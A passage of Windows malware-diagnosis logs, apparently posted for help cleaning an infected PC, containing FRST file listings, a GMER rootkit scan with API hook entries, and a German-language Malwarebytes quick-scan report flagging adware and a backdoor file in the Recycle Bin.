2013-12-28 11:55 - 2010-08-06 07:43 - 01001472 _____ (DiBcom SA) C:\Windows\system32\Drivers\mod7700.sys
2013-12-28 11:55 - 2010-07-27 09:52 - 00117248 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_hwusbdev.sys
2013-12-28 11:53 - 2013-12-28 11:57 - 00000000 ____D C:\ProgramData\DatacardService
2013-12-23 08:35 - 2013-12-23 08:36 - 14335560 _____ C:\Users\*****\Downloads\flags.zip
2013-12-17 12:17 - 2013-12-17 12:21 - 103312806 _____ C:\Users\*****\Downloads\d012f60a.sql
2013-12-17 12:12 - 2013-12-17 12:12 - 00108255 _____ C:\Users\*****\Downloads\Open_Graph_Protocol_v2.6_j25_unzipfirst.zip
2013-12-17 11:41 - 2013-12-17 12:07 - 00000000 ____D C:\Users\*****\Desktop\mp3

==================== One Month Modified Files and Folders =======

2014-01-15 08:44 - 2014-01-15 08:44 - 00000000 ____D C:\FRST
2014-01-15 08:44 - 2014-01-15 08:43 - 02076160 _____ (Farbar) C:\Users\*****\Downloads\FRST64.exe
2014-01-15 08:42 - 2014-01-15 08:42 - 00000000 _____ C:\Users\*****\defogger_reenable
2014-01-15 08:42 - 2010-12-11 20:34 - 00000000 ____D C:\Users\*****
2014-01-15 08:41 - 2014-01-15 08:41 - 00050477 _____ C:\Users\*****\Downloads\Defogger.exe
2014-01-15 08:39 - 2010-12-11 20:50 - 00001110 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-01-15 07:43 - 2009-07-14 05:45 - 00009920 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-01-15 07:43 - 2009-07-14 05:45 - 00009920 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-01-15 07:39 - 2010-07-28 14:21 - 01592860 _____ C:\Windows\WindowsUpdate.log
2014-01-15 07:36 - 2011-07-14 17:04 - 00000000 ___RD C:\Users\*****\Dropbox
2014-01-15 07:36 - 2011-07-14 17:03 - 00000000 ____D C:\Users\*****\AppData\Roaming\Dropbox
2014-01-15 07:35 - 2010-12-11 20:50 - 00001106 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-01-15 07:34 - 2010-07-28 14:27 - 00000000 ____D C:\ProgramData\NVIDIA
2014-01-15 07:34 - 2009-07-14 06:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2014-01-15 07:34 - 2009-07-14 05:51 - 00137813 _____ C:\Windows\setupact.log
2014-01-14 19:07 - 2010-07-26 14:08 - 00700380 _____ C:\Windows\system32\perfh007.dat
2014-01-14 19:07 - 2010-07-26 14:08 - 00149176 _____ C:\Windows\system32\perfc007.dat
2014-01-14 19:07 - 2009-07-14 06:13 - 01622100 _____ C:\Windows\system32\PerfStringBackup.INI
2014-01-14 18:58 - 2010-12-20 12:28 - 00000000 ____D C:\Users\*****\AppData\Roaming\gSyncit
2014-01-14 18:54 - 2014-01-14 18:26 - 625348608 _____ C:\Users\*****\Downloads\rescue-system.iso
2014-01-14 18:50 - 2014-01-14 18:40 - 121822819 _____ C:\Users\*****\Downloads\avg_arl_ffi_all_120_130801a6481.rar
2014-01-14 18:44 - 2014-01-14 18:44 - 00002952 _____ C:\Users\*****\Downloads\access_log_2013-11-12.gz
2014-01-14 18:42 - 2014-01-14 18:42 - 00002316 _____ C:\Users\*****\Downloads\access_log_2014-01-05.gz
2014-01-14 18:38 - 2014-01-14 18:15 - 00043520 ___SH C:\Users\*****\AppData\Roaming\Thumbs.db
2014-01-14 18:35 - 2014-01-14 18:28 - 112001024 _____ C:\Users\*****\Downloads\avg_arl_cdi_all_120_130801a6481.iso
2014-01-14 18:16 - 2010-12-18 20:23 - 00000000 ____D C:\Users\*****\AppData\Roaming\FileZilla
2014-01-14 18:09 - 2014-01-14 18:09 - 05063616 _____ (PortableApps.com) C:\Users\*****\Downloads\FileZillaPortable_3.7.3.paf.exe
2014-01-14 17:08 - 2011-01-06 16:46 - 00269936 _____ C:\Users\Admin\AppData\Local\GDIPFONTCACHEV1.DAT
2014-01-14 15:32 - 2013-10-19 19:14 - 00000557 _____ C:\Users\*****\Desktop\moooooovie.txt
2014-01-14 15:11 - 2014-01-14 15:11 - 00378099 _____ C:\Users\*****\Downloads\10_246_16_68.sql
2014-01-14 11:04 - 2014-01-14 11:03 - 00000000 ____D C:\Users\*****\Desktop\templates_c
2014-01-13 16:38 - 2013-12-04 17:50 - 00000053 _____ C:\Users\*****\Downloads\google63a169ac443c121d.html
2014-01-13 16:31 - 2014-01-13 16:31 - 01790152 _____ C:\Users\*****\Downloads\com_phocagallery_v3.2.6(1).zip
2014-01-13 14:04 - 2014-01-13 14:04 - 00000282 _____ C:\Users\*****\Desktop\10 Schritte zum erfolgreichen Facebook-Gewinnspiel Fanpage Karma Blog.URL
2014-01-13 06:48 - 2009-07-14 05:45 - 01348600 _____ C:\Windows\system32\FNTCACHE.DAT
2014-01-12 17:57 - 2013-11-29 20:15 - 00002356 _____ C:\Users\*****\Desktop\kauuuuuuf.txt
2014-01-12 16:53 - 2014-01-12 16:53 - 00000217 _____ C:\Users\*****\Desktop\The Scale of the Universe 2 — Other Languages.URL
2014-01-12 10:56 - 2014-01-12 10:56 - 00028736 _____ C:\Users\*****\Downloads\12_01_2014_WebFTP.zip
2014-01-12 09:24 - 2010-12-11 20:34 - 00269936 _____ C:\Users\*****\AppData\Local\GDIPFONTCACHEV1.DAT
2014-01-12 09:20 - 2014-01-12 09:20 - 00119546 _____ C:\Users\*****\Downloads\droid-serif.zip
2014-01-12 09:20 - 2014-01-12 09:20 - 00079700 _____ C:\Users\*****\Downloads\droid-sans-mono.zip
2014-01-12 09:20 - 2014-01-12 09:20 - 00011194 _____ C:\Users\*****\Downloads\Droid.zip
2014-01-12 09:19 - 2014-01-12 09:19 - 00211015 _____ C:\Users\*****\Downloads\Droid-Sans.zip
2014-01-11 20:33 - 2014-01-11 20:32 - 00002057 _____ C:\Users\*****\Desktop\configuration.php
2014-01-10 16:38 - 2009-07-14 04:20 - 00000000 ____D C:\Windows\system32\NDF
2014-01-10 11:14 - 2009-07-14 03:34 - 00000531 _____ C:\Windows\win.ini
2014-01-10 10:58 - 2014-01-10 10:58 - 00036115 _____ C:\Users\*****\Downloads\access-2014010821-2014011002.log.gz
2014-01-09 12:03 - 2014-01-09 11:59 - 126234924 _____ C:\Users\*****\Downloads\Vorübung zu Swan Dive Prep.wmv
2014-01-09 07:10 - 2012-02-07 11:46 - 00001506 _____ C:\Windows\wininit.ini
2014-01-09 07:10 - 2011-07-14 17:04 - 00001025 _____ C:\Users\*****\Desktop\Dropbox.lnk
2014-01-09 07:10 - 2011-07-14 17:03 - 00000000 ____D C:\Users\*****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
2014-01-09 07:10 - 2010-12-11 20:35 - 00000000 ___RD C:\Users\*****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
2014-01-09 06:39 - 2009-11-18 23:09 - 00811302 _____ C:\Windows\PFRO.log
2014-01-08 11:52 - 2014-01-08 11:52 - 00002371 _____ C:\Users\*****\Downloads\address.zip
2014-01-08 11:15 - 2014-01-08 11:15 - 00000000 ____D C:\Program Files (x86)\FlippingBook
2014-01-08 11:15 - 2014-01-08 11:13 - 00000000 __HDC C:\ProgramData\{0C886C27-6204-4A3D-8348-A42A59BC7205}
2014-01-08 11:15 - 2013-12-09 14:27 - 00001153 _____ C:\Users\Public\Desktop\FlippingBook Publisher Professional.lnk
2014-01-08 11:14 - 2013-12-09 14:25 - 00000000 __HDC C:\ProgramData\{CA331EC7-0458-49DF-8B26-9E171A9EAE0D}
2014-01-08 11:13 - 2014-01-08 11:13 - 00000000 ____D C:\Users\*****\AppData\Local\III
2014-01-07 19:50 - 2014-01-07 19:50 - 00000233 _____ C:\Users\*****\Desktop\Fly Birds Hd Legendary Birds Legendary Pokemon. Colourful Pheasant Birds Wallpapers. Fly Birds Hd ~ Photoinpixel.URL
2014-01-05 16:21 - 2011-01-03 16:37 - 00000000 ____D C:\Users\*****\AppData\Roaming\Azureus
2014-01-04 19:06 - 2014-01-04 19:06 - 00003714 _____ C:\Users\*****\Desktop\pointclouds - Verknüpfung.lnk
2014-01-04 16:21 - 2013-12-12 14:55 - 00000000 ____D C:\Users\*****\Desktop\löschen_____
2014-01-02 11:26 - 2014-01-02 11:26 - 00000053 _____ C:\Users\*****\Desktop\google63a169ac443c121d.html
2013-12-31 14:08 - 2013-12-31 14:08 - 00000225 _____ C:\Users\*****\Desktop\macklemore album.URL
2013-12-30 20:16 - 2013-12-30 20:11 - 176752984 _____ (VMware, Inc.                                                   ) C:\Users\*****\Downloads\VMware-converter-en-5.5.0-1362012.exe
2013-12-30 08:58 - 2013-12-30 08:54 - 98508144 _____ (VMware, Inc.) C:\Users\*****\Downloads\VMware-player-6.0.1-1379776.exe
2013-12-30 08:35 - 2013-12-30 08:35 - 00409141 _____ C:\Users\*****\Downloads\torbutton146-current.zip
2013-12-29 12:29 - 2013-12-29 12:29 - 00000000 ____D C:\Users\*****\AppData\Roaming\Stellarium
2013-12-29 12:29 - 2013-12-29 12:29 - 00000000 ____D C:\Users\*****\AppData\Local\stellarium
2013-12-29 12:28 - 2013-12-29 12:28 - 00001724 _____ C:\Users\Public\Desktop\Stellarium.lnk
2013-12-29 12:28 - 2013-12-29 12:28 - 00000000 ____D C:\Program Files\Stellarium
2013-12-29 11:24 - 2013-12-29 11:22 - 81699167 _____ (Stellarium team                                             ) C:\Users\*****\Downloads\stellarium-0.12.4-win64.exe
2013-12-28 16:39 - 2013-09-01 18:06 - 00000000 ____D C:\Users\Admin\Desktop\test
2013-12-28 16:39 - 2010-12-23 11:42 - 00000000 ____D C:\Users\Admin\AppData\Roaming\Mozilla
2013-12-28 16:36 - 2010-12-23 11:42 - 00000000 ____D C:\Users\Admin\AppData\Local\Mozilla
2013-12-28 11:57 - 2013-12-28 11:57 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_ew_juextctrl_01007.Wdf
2013-12-28 11:57 - 2013-12-28 11:57 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_ew_jucdcacm_01007.Wdf
2013-12-28 11:57 - 2013-12-28 11:57 - 00000000 ____D C:\Users\*****\AppData\Roaming\Sierra Wireless
2013-12-28 11:57 - 2013-12-28 11:56 - 00000000 ____D C:\ProgramData\mquadr.at
2013-12-28 11:57 - 2013-12-28 11:53 - 00000000 ____D C:\ProgramData\DatacardService
2013-12-28 11:56 - 2013-12-28 11:56 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_ew_jubusenum_01007.Wdf
2013-12-28 11:56 - 2013-12-28 11:56 - 00000000 ____D C:\Users\*****\AppData\Local\mquadr.at
2013-12-28 11:55 - 2013-12-28 11:55 - 00001163 _____ C:\Users\Public\Desktop\3InternetManager.lnk
2013-12-28 11:55 - 2013-12-28 11:55 - 00000000 __HDC C:\ProgramData\{A48B2592-413B-41AB-8710-5543CB7481EC}
2013-12-28 11:55 - 2013-12-28 11:55 - 00000000 ____D C:\ProgramData\H3G
2013-12-28 11:55 - 2013-12-28 11:55 - 00000000 ____D C:\Program Files (x86)\3InternetManager
2013-12-26 18:07 - 2013-09-26 18:33 - 00000000 ____D C:\Users\*****\Desktop\Stadtkrug Dropbox Lager brennen
2013-12-23 08:36 - 2013-12-23 08:35 - 14335560 _____ C:\Users\*****\Downloads\flags.zip
2013-12-22 12:18 - 2013-12-08 11:17 - 00001094 _____ C:\Users\Public\Desktop\TeamViewer 9.lnk
2013-12-19 11:41 - 2009-11-18 22:56 - 00000000 ____D C:\Program Files (x86)\Google
2013-12-17 20:00 - 2010-12-11 20:47 - 00000000 ____D C:\Users\*****\AppData\Roaming\Adobe
2013-12-17 12:21 - 2013-12-17 12:17 - 103312806 _____ C:\Users\*****\Downloads\d012f60a.sql
2013-12-17 12:12 - 2013-12-17 12:12 - 00108255 _____ C:\Users\*****\Downloads\Open_Graph_Protocol_v2.6_j25_unzipfirst.zip
2013-12-17 12:07 - 2013-12-17 11:41 - 00000000 ____D C:\Users\*****\Desktop\mp3
2013-12-16 09:17 - 2010-12-25 15:48 - 00001998 ____H C:\Users\*****\Documents\Default.rdp

Some content of TEMP:
====================
C:\Users\*****\AppData\Local\Temp\7.2.20.2-EasyShrx.Dll
C:\Users\*****\AppData\Local\Temp\autorun.dll
C:\Users\*****\AppData\Local\Temp\fox.dll
C:\Users\*****\AppData\Local\Temp\i4jdel0.exe
C:\Users\*****\AppData\Local\Temp\icu34.dll
C:\Users\*****\AppData\Local\Temp\icudt34.dll
C:\Users\*****\AppData\Local\Temp\InstallFlashPlayer.exe
C:\Users\*****\AppData\Local\Temp\jre-6u24-windows-i586-iftw-rv.exe
C:\Users\*****\AppData\Local\Temp\jre-6u26-windows-i586-iftw-rv.exe
C:\Users\*****\AppData\Local\Temp\jre-6u31-windows-i586-iftw-rv.exe
C:\Users\*****\AppData\Local\Temp\jre-6u33-windows-i586-iftw.exe
C:\Users\*****\AppData\Local\Temp\jre-6u35-windows-i586-iftw.exe
C:\Users\*****\AppData\Local\Temp\jre-7u17-windows-i586-iftw.exe
C:\Users\*****\AppData\Local\Temp\jre-7u21-windows-i586-iftw.exe
C:\Users\*****\AppData\Local\Temp\jre-7u25-windows-i586-iftw.exe
C:\Users\*****\AppData\Local\Temp\jre-7u45-windows-i586-iftw.exe
C:\Users\*****\AppData\Local\Temp\mgxfonts.exe
C:\Users\*****\AppData\Local\Temp\MgxVistaTools.dll
C:\Users\*****\AppData\Local\Temp\msvcp71.dll
C:\Users\*****\AppData\Local\Temp\msvcr71.dll
C:\Users\*****\AppData\Local\Temp\TrueImageInstallMenu_standard.exe
C:\Users\*****\AppData\Local\Temp\ufkdfhxo.dll
C:\Users\*****\AppData\Local\Temp\xmlUpdater.exe
C:\Users\*****\AppData\Local\Temp\_is5467.exe
C:\Users\*****\AppData\Local\Temp\_is8325.exe
C:\Users\*****\AppData\Local\Temp\~convert1847027883366102978.exe
C:\Users\*****\AppData\Local\Temp\~convert2352740266388634011.exe
C:\Users\*****\AppData\Local\Temp\~convert2379864614059401350.exe
C:\Users\*****\AppData\Local\Temp\~convert3333224244493361257.exe
C:\Users\*****\AppData\Local\Temp\~convert3538011537334474619.exe
C:\Users\*****\AppData\Local\Temp\~convert3758073310861530453.exe
C:\Users\*****\AppData\Local\Temp\~convert4662644507391680170.exe
C:\Users\*****\AppData\Local\Temp\~convert5385746307805284974.exe
C:\Users\*****\AppData\Local\Temp\~convert5447643698699501366.exe
C:\Users\*****\AppData\Local\Temp\~convert6248421720152768299.exe
C:\Users\*****\AppData\Local\Temp\~convert7003483147854060770.exe
C:\Users\*****\AppData\Local\Temp\~convert7495889309273498126.exe
C:\Users\*****\AppData\Local\Temp\~convert8100649724065807693.exe
C:\Users\*****\AppData\Local\Temp\~convert8170032136072084689.exe
C:\Users\*****\AppData\Local\Temp\~convert818302282860499790.exe
C:\Users\*****\AppData\Local\Temp\~convert8447076207564456903.exe
C:\Users\*****\AppData\Local\Temp\~convert8627151247518695499.exe
C:\Users\*****\AppData\Local\Temp\~convert8691066825310743538.exe
C:\Users\*****\AppData\Local\Temp\~convert901516844038934599.exe


==================== Bamital & volsnap Check =================

C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit


LastRegBack: 2014-01-09 07:35

==================== End Of Log ============================
         
Gmer.log
Code:
ATTFilter
GMER 2.1.19163 - hxxp://www.gmer.net
Rootkit scan 2014-01-15 08:59:45
Windows 6.1.7601 Service Pack 1 x64 \Device\Harddisk0\DR0 -> \Device\Ide\IAAStorageDevice-1 ST310005 rev.CC44 931,51GB
Running: gmer_2.1.19163.exe; Driver: C:\Users\*****\AppData\Local\Temp\kwdirpoc.sys


---- Kernel code sections - GMER 2.1 ----

INITKDBG  C:\Windows\system32\ntoskrnl.exe!ExDeleteNPagedLookasideList + 528                                                                                                                                                              fffff80003801000 45 bytes [00, 00, 16, 02, 4E, 74, 66, ...]
INITKDBG  C:\Windows\system32\ntoskrnl.exe!ExDeleteNPagedLookasideList + 575                                                                                                                                                              fffff8000380102f 10 bytes [00, 01, 00, 06, 00, 00, 00, ...]

---- User code sections - GMER 2.1 ----

.text     C:\Progra~2\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe[2812] C:\Windows\syswow64\msvcrt.dll!free                                                                                                                         0000000076699894 5 bytes JMP 000000010a90d2d0
.text     C:\Progra~2\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe[2812] C:\Windows\syswow64\msvcrt.dll!malloc                                                                                                                       0000000076699cee 5 bytes JMP 000000010a90d230
.text     C:\Progra~2\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe[2812] C:\Windows\syswow64\msvcrt.dll!??3@YAXPAX@Z                                                                                                                 000000007669b0b9 5 bytes JMP 000000010a90d2d0
.text     C:\Progra~2\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe[2812] C:\Windows\syswow64\msvcrt.dll!??2@YAPAXI@Z                                                                                                                 000000007669b0c9 5 bytes JMP 000000010a90d480
.text     C:\Progra~2\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe[2812] C:\Windows\syswow64\msvcrt.dll!realloc                                                                                                                      000000007669b10d 5 bytes JMP 000000010a90d2b0
.text     C:\Progra~2\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe[2812] C:\Windows\syswow64\msvcrt.dll!calloc                                                                                                                       000000007669c456 5 bytes JMP 000000010a90d270
.text     C:\Progra~2\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe[2812] C:\Windows\syswow64\msvcrt.dll!_msize                                                                                                                       000000007669f43b 5 bytes JMP 000000010a90d2e0
.text     C:\Progra~2\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe[2812] C:\Windows\syswow64\msvcrt.dll!_aligned_free                                                                                                                00000000766b5942 5 bytes JMP 000000010a90d2d0
.text     C:\Progra~2\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe[2812] C:\Windows\syswow64\msvcrt.dll!_aligned_malloc                                                                                                              00000000766c028d 5 bytes JMP 000000010a90d3c0
.text     C:\Progra~2\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe[2812] C:\Windows\syswow64\msvcrt.dll!_aligned_offset_malloc                                                                                                       00000000766c02a9 5 bytes JMP 000000010a90d3e0
.text     C:\Progra~2\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe[2812] C:\Windows\syswow64\msvcrt.dll!?set_new_handler@@YAP6AXXZP6AXXZ@Z                                                                                           00000000766ebfd1 5 bytes JMP 000000010a90d500
.text     C:\Progra~2\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe[2812] C:\Windows\syswow64\msvcrt.dll!_aligned_offset_realloc                                                                                                      00000000766ebfe1 5 bytes JMP 000000010a90d420
.text     C:\Progra~2\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe[2812] C:\Windows\syswow64\msvcrt.dll!_aligned_realloc                                                                                                             00000000766ec16b 5 bytes JMP 000000010a90d400
.text     C:\Progra~2\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe[2812] C:\Windows\syswow64\msvcrt.dll!_expand                                                                                                                      00000000766ec18a 5 bytes JMP 000000010a90d3a0
.text     C:\Progra~2\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe[2812] C:\Windows\syswow64\msvcrt.dll!_heapadd                                                                                                                     00000000766edd03 5 bytes JMP 000000010a90d550
.text     C:\Progra~2\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe[2812] C:\Windows\syswow64\msvcrt.dll!_heapchk                                                                                                                     00000000766edd17 5 bytes JMP 000000010a90d560
.text     C:\Progra~2\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe[2812] C:\Windows\syswow64\msvcrt.dll!_heapset + 1                                                                                                                 00000000766ede16 4 bytes {JMP 0xffffffff9421f76b}
.text     C:\Progra~2\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe[2812] C:\Windows\syswow64\msvcrt.dll!_heapmin                                                                                                                     00000000766ede1f 5 bytes JMP 000000010a90d650
.text     C:\Progra~2\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe[2812] C:\Windows\syswow64\msvcrt.dll!_heapused                                                                                                                    00000000766edf05 5 bytes JMP 000000010a90d620
.text     C:\Progra~2\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe[2812] C:\Windows\syswow64\msvcrt.dll!_heapwalk                                                                                                                    00000000766edf18 5 bytes JMP 000000010a90d590
.text     C:\Windows\SysWOW64\dgdersvc.exe[3012] C:\Windows\syswow64\PSAPI.DLL!GetModuleInformation + 69                                                                                                                                  0000000076cd1465 2 bytes [CD, 76]
.text     C:\Windows\SysWOW64\dgdersvc.exe[3012] C:\Windows\syswow64\PSAPI.DLL!GetModuleInformation + 155                                                                                                                                 0000000076cd14bb 2 bytes [CD, 76]
.text     ...                                                                                                                                                                                                                             * 2
.text     C:\Program Files (x86)\Acer\Hotkey Utility\HotkeyUtility.exe[3720] C:\Windows\syswow64\PSAPI.DLL!GetModuleInformation + 69                                                                                                      0000000076cd1465 2 bytes [CD, 76]
.text     C:\Program Files (x86)\Acer\Hotkey Utility\HotkeyUtility.exe[3720] C:\Windows\syswow64\PSAPI.DLL!GetModuleInformation + 155                                                                                                     0000000076cd14bb 2 bytes [CD, 76]
.text     ...                                                                                                                                                                                                                             * 2
.text     C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe[4996] C:\Windows\syswow64\PSAPI.DLL!GetModuleInformation + 69                                                                                   0000000076cd1465 2 bytes [CD, 76]
.text     C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe[4996] C:\Windows\syswow64\PSAPI.DLL!GetModuleInformation + 155                                                                                  0000000076cd14bb 2 bytes [CD, 76]
.text     ...                                                                                                                                                                                                                             * 2
.text     C:\Program Files (x86)\Audible\Bin\AudibleDownloadHelper.exe[5092] C:\Windows\syswow64\kernel32.dll!FindResourceW                                                                                                               0000000076e65911 5 bytes JMP 0000000100440980
.text     C:\Program Files (x86)\Audible\Bin\AudibleDownloadHelper.exe[5092] C:\Windows\syswow64\kernel32.dll!FindResourceA                                                                                                               0000000076e7e953 5 bytes JMP 0000000100440930
.text     C:\Program Files (x86)\Audible\Bin\AudibleDownloadHelper.exe[5092] C:\Windows\syswow64\user32.DLL!LoadStringW                                                                                                                   0000000076cf8eb9 5 bytes JMP 0000000100440fd0
.text     C:\Program Files (x86)\Audible\Bin\AudibleDownloadHelper.exe[5092] C:\Windows\syswow64\user32.DLL!LoadStringA                                                                                                                   0000000076cfdb21 5 bytes JMP 0000000100441110
.text     C:\Program Files (x86)\Audible\Bin\AudibleDownloadHelper.exe[5092] C:\Windows\syswow64\user32.DLL!LoadMenuW                                                                                                                     0000000076d04391 5 bytes JMP 0000000100440b40
.text     C:\Program Files (x86)\Audible\Bin\AudibleDownloadHelper.exe[5092] C:\Windows\syswow64\user32.DLL!LoadMenuA                                                                                                                     0000000076d14eef 5 bytes JMP 0000000100440ad0
.text     C:\Program Files (x86)\Audible\Bin\AudibleDownloadHelper.exe[5092] C:\Windows\syswow64\user32.DLL!CreateDialogParamA                                                                                                            0000000076d15246 5 bytes JMP 00000001004409d0
.text     C:\Program Files (x86)\Audible\Bin\AudibleDownloadHelper.exe[5092] C:\Windows\syswow64\user32.DLL!CreateDialogParamW                                                                                                            0000000076d210dc 5 bytes JMP 0000000100440a50
.text     C:\Program Files (x86)\Audible\Bin\AudibleDownloadHelper.exe[5092] C:\Windows\syswow64\PSAPI.DLL!GetModuleInformation + 69                                                                                                      0000000076cd1465 2 bytes [CD, 76]
.text     C:\Program Files (x86)\Audible\Bin\AudibleDownloadHelper.exe[5092] C:\Windows\syswow64\PSAPI.DLL!GetModuleInformation + 155                                                                                                     0000000076cd14bb 2 bytes [CD, 76]
.text     ...                                                                                                                                                                                                                             * 2
.text     C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe[4756] C:\Windows\syswow64\Psapi.dll!GetModuleInformation + 69                                                                                                           0000000076cd1465 2 bytes [CD, 76]
.text     C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe[4756] C:\Windows\syswow64\Psapi.dll!GetModuleInformation + 155                                                                                                          0000000076cd14bb 2 bytes [CD, 76]
.text     ...                                                                                                                                                                                                                             * 2
.text     C:\Program Files (x86)\Microsoft LifeCam\LifeTray.exe[6468] C:\Windows\SysWOW64\d3d8thk.dll!OsThunkDdWaitForVerticalBlank + 195                                                                                                 0000000071121b41 2 bytes [12, 71]
.text     C:\Program Files (x86)\Microsoft LifeCam\LifeTray.exe[6468] C:\Windows\SysWOW64\d3d8thk.dll!OsThunkDdWaitForVerticalBlank + 362                                                                                                 0000000071121be8 2 bytes [12, 71]
.text     C:\Program Files (x86)\Microsoft LifeCam\LifeTray.exe[6468] C:\Windows\SysWOW64\d3d8thk.dll!OsThunkDdWaitForVerticalBlank + 418                                                                                                 0000000071121c20 2 bytes [12, 71]
.text     C:\Program Files (x86)\Microsoft LifeCam\LifeTray.exe[6468] C:\Windows\SysWOW64\d3d8thk.dll!OsThunkDdWaitForVerticalBlank + 596                                                                                                 0000000071121cd2 2 bytes [12, 71]
.text     C:\Program Files (x86)\Microsoft LifeCam\LifeTray.exe[6468] C:\Windows\SysWOW64\d3d8thk.dll!OsThunkDdWaitForVerticalBlank + 628                                                                                                 0000000071121cf2 2 bytes [12, 71]
.text     C:\Program Files (x86)\Microsoft LifeCam\LifeEnC2.exe[7172] C:\Windows\SysWOW64\d3d8thk.dll!OsThunkDdWaitForVerticalBlank + 195                                                                                                 0000000071121b41 2 bytes [12, 71]
.text     C:\Program Files (x86)\Microsoft LifeCam\LifeEnC2.exe[7172] C:\Windows\SysWOW64\d3d8thk.dll!OsThunkDdWaitForVerticalBlank + 362                                                                                                 0000000071121be8 2 bytes [12, 71]
.text     C:\Program Files (x86)\Microsoft LifeCam\LifeEnC2.exe[7172] C:\Windows\SysWOW64\d3d8thk.dll!OsThunkDdWaitForVerticalBlank + 418                                                                                                 0000000071121c20 2 bytes [12, 71]
.text     C:\Program Files (x86)\Microsoft LifeCam\LifeEnC2.exe[7172] C:\Windows\SysWOW64\d3d8thk.dll!OsThunkDdWaitForVerticalBlank + 596                                                                                                 0000000071121cd2 2 bytes [12, 71]
.text     C:\Program Files (x86)\Microsoft LifeCam\LifeEnC2.exe[7172] C:\Windows\SysWOW64\d3d8thk.dll!OsThunkDdWaitForVerticalBlank + 628                                                                                                 0000000071121cf2 2 bytes [12, 71]

---- Registry - GMER 2.1 ----

Reg       HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Persisted@C:\Users\*****\Desktop\acer-istallation-201012\Acronis\xa0True\xa0Image\xa0Home 11.0 Kauf hhhhh BU Daten\Acronis\Setup.exe  1

---- EOF - GMER 2.1 ----
         
MBAM-Quickscan-log-2014-01-15 (09-20-02).txt
Code:
ATTFilter
Malwarebytes Anti-Malware 1.75.0.1300
www.malwarebytes.org

Datenbank Version: v2014.01.15.02

Windows 7 Service Pack 1 x64 NTFS
Internet Explorer 11.0.9600.16476
***** :: *****-PC [Administrator]

15.01.2014 09:06:41
MBAM-Quickscan-log-2014-01-15 (09-20-02).txt

Art des Suchlaufs: Quick-Scan
Aktivierte Suchlaufeinstellungen: Speicher | Autostart | Registrierung | Dateisystem | Heuristiks/Extra | HeuristiKs/Shuriken | PUP | PUM
Deaktivierte Suchlaufeinstellungen: P2P
Durchsuchte Objekte: 310708
Laufzeit: 9 Minute(n), 8 Sekunde(n)

Infizierte Speicherprozesse: 0
(Keine bösartigen Objekte gefunden)

Infizierte Speichermodule: 0
(Keine bösartigen Objekte gefunden)

Infizierte Registrierungsschlüssel: 2
HKCU\Software\InstallCore\1I1T1Q1S (PUP.Optional.InstallCore.A) -> Keine Aktion durchgeführt.
HKCU\SOFTWARE\INSTALLCORE (PUP.Optional.InstallCore.A) -> Keine Aktion durchgeführt.

Infizierte Registrierungswerte: 1
HKCU\Software\InstallCore|tb (PUP.Optional.InstallCore.A) -> Daten: 1W1G1U1K1O1H -> Keine Aktion durchgeführt.

Infizierte Dateiobjekte der Registrierung: 0
(Keine bösartigen Objekte gefunden)

Infizierte Verzeichnisse: 0
(Keine bösartigen Objekte gefunden)

Infizierte Dateien: 4
C:\$Recycle.Bin\S-1-5-21-1797653687-739084669-777346648-1001\$ROMGUCE.exe (PUP.Optional.RegCleanerPro) -> Keine Aktion durchgeführt.
C:\$Recycle.Bin\S-1-5-21-1797653687-739084669-777346648-1001\$RWBRD16.zip (Backdoor.Agent.WRRGen) -> Keine Aktion durchgeführt.
